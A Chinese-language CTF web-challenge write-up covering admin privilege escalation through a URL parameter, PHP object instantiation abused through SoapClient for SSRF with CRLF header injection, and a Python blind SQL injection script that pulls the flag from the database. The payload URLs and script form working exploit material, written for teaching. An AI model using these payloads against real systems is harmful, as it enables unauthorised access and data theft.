重来

点击此处获得更好的阅读体验

---

WriteUp来源

官方WP

题目考点

• SQL注入

解题思路

访问网站，是个登陆

登陆处发现login.js，使用test@qq.com/test登录

更改user为admin，访问，越权成功

http://xxxx.xxx.xxx.xx/a.php?classname=index&param2=admin

发现地址发生了变化并且多了一个隐藏的表单

提交id=1

提示要127.0.0.1，那就是需要ssrf了，观察登陆时的url

http://192.144.157.29:8080/a.php?classname=login&param2=1

classname是一个类名字，param2是这个类的第2个参数，这里存在一个任意对象实列化漏洞，输入一个不存在的类

输入php的内置类Exception

内置类SimpleXMLElement

2者都报第二个参数错误，应该是第一个参数被固定了，结合ssrf，想到了内置类soapClient,验证

http://xxxxxxx/a.php?classname=soapclient&param2[location]=http://vps/&param2[uri]=1231

但soapclient只能传递get参数，post为自己生成的xml数据，不可控，但soapclient可以自己配置部分请求头如user_agent，并且存在CRLF问题，比如

构造一个post请求,注意带上cookie

http://xxxx/a.php?classname=soapclient&param2[location]=http://127.0.0.1/new_adminuser.php&param2[user_agent]=aa%0d%0aCookie:%20isadmin=1;flag=1%0d%0aContent-Type:%20application/x-www-form-urlencoded%0d%0aContent-Length:%20367%0d%0a%0d%0aid=1%26a=&param2[uri]=123

更改vps为127.0.0.1，仍然没有flag

id参数可能是个注入，尝试注入payload

存在注入，注入脚本

import requests
#url_template="http://xxxxxx/a.php?classname=soapclient&param2[location]=http://127.0.0.1/new_adminuser.php&param2[user_agent]=aa%0d%0aCookie:%20isadmin=1;flag=1%0d%0aContent-Type:%20application/x-www-form-urlencoded%0d%0aContent-Length:%20367%0d%0a%0d%0aid=1%27%20and ascii(substr(database(),{},1))={}%23%26a=&param2[uri]=123"
#数据库名user
#url_template="http://xxxxxxxx/a.php?classname=soapclient&param2[location]=http://127.0.0.1/new_adminuser.php&param2[user_agent]=aa%0d%0aCookie:%20isadmin=1;flag=1%0d%0aContent-Type:%20application/x-www-form-urlencoded%0d%0aContent-Length:%20367%0d%0a%0d%0aid=1%27%20and ascii(substr((SELECT group_concat(table_name) FROM information_schema.tables where table_schema=0x75736572),{},1))={}%23%26a=&param2[uri]=123"
#表名flag
#url_template="http://xxxxxxxx/a.php?classname=soapclient&param2[location]=http://127.0.0.1/new_adminuser.php&param2[user_agent]=aa%0d%0aCookie:%20isadmin=1;flag=1%0d%0aContent-Type:%20application/x-www-form-urlencoded%0d%0aContent-Length:%20367%0d%0a%0d%0aid=1%27%20and ascii(substr((SELECT group_concat(column_name) FROM information_schema.columns where table_name=0x666c6167 ),{},1))={}%23%26a=&param2[uri]=123"
#字段名flaaagggg
url_template="http://xxxxx/a.php?classname=soapclient&param2[location]=http://127.0.0.1/new_adminuser.php&param2[user_agent]=aa%0d%0aCookie:%20isadmin=1;flag=1%0d%0aContent-Type:%20application/x-www-form-urlencoded%0d%0aContent-Length:%20367%0d%0a%0d%0aid=1%27%20and ascii(substr((select group_concat(flaaagggg) from flag),{},1))={}%23%26a=&param2[uri]=123"
​
#payloads='abcdefghijklmnopqrstuvwxyz1234567890ABCDEFGHIJKLMNOPQRSTUVWXYZ\,_\{\}'
payloads = 'abcdefghigklmnopqrstuvwxyz,\{\}ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789~!#$%^&*()-+@_.'
​
database_name=''
for j in range(1,50):
    for i in payloads:
        i_ascii=ord(i)
        url=url_template.format(j,i_ascii)
        result=requests.get(url)
        length=len(result.text)
        if length>300:
            database_name+=i
            print(database_name)
            break